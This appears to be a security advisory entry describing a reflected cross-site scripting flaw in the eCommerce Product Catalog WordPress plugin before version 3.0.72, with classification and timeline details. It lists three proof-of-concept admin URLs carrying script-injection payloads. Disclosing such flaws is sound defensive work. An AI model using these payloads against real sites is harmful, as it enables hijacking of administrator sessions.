WordPress Plugin Vulnerabilities

eCommerce Product Catalog Plugin for WordPress < 3.0.72 - Reflected XSS

Description

The plugin does not sanitise and escape some parameter before outputting them back in attributes and JS code in admin dashboards, leading to Reflected Cross-Site Scripting

Proof of Concept

Make a logged in admin open one of the URLs below

https://example.com/wp-admin/edit.php?post_type=al_product&page=extensions.php&implecode_install=1&slug=a&url="><script>alert(/XSS/)</script>

https://example.com/wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=aaa&find_option_name=</script><script>alert(/XSS/)</script>
https://example.com/wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=aaa&find_option_name=%2527]%2522)%3Balert(/XSS/)//

Affects Plugins

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
WPScan
Verified
Yes

Timeline

Publicly Published
2022-10-17 (about 1 years ago)
Added
2022-10-17 (about 1 years ago)
Last Updated
2022-10-17 (about 1 years ago)

Other